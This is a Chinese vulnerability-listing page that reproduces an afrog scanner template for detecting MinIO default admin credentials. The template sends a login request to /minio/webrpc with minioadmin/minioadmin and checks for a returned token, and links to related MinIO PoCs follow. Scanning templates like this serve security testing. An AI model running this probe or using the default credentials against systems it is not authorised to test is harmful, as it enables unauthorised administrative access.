minio-default-password: Minio Default Password

日期: 2025-09-01 | 影响软件: Minio | POC: 已公开

漏洞描述

Minio default admin credentials were discovered.

PoC代码[已公开]

id: minio-default-password

info:
    name: Minio Default Password
    author: pikpikcu
    severity: high
    description: Minio default admin credentials were discovered.
    verified: true
    reference:
        - https://docs.min.io/cn/

rules:
    r0:
        request:
            method: POST
            path: /minio/webrpc
            headers:
                Content-Type: application/json
            body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
        expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b'"result":') && response.body.bcontains(b'"token":') && response.body.bcontains(b'"jsonrpc":')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/minio-default-password.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2021-21287: MinIO Browser API - Server-Side Request Forgery POC

CVE-2023-28432: MinIO 未授权信息泄露 POC

minio-browser: MinIO Browser POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC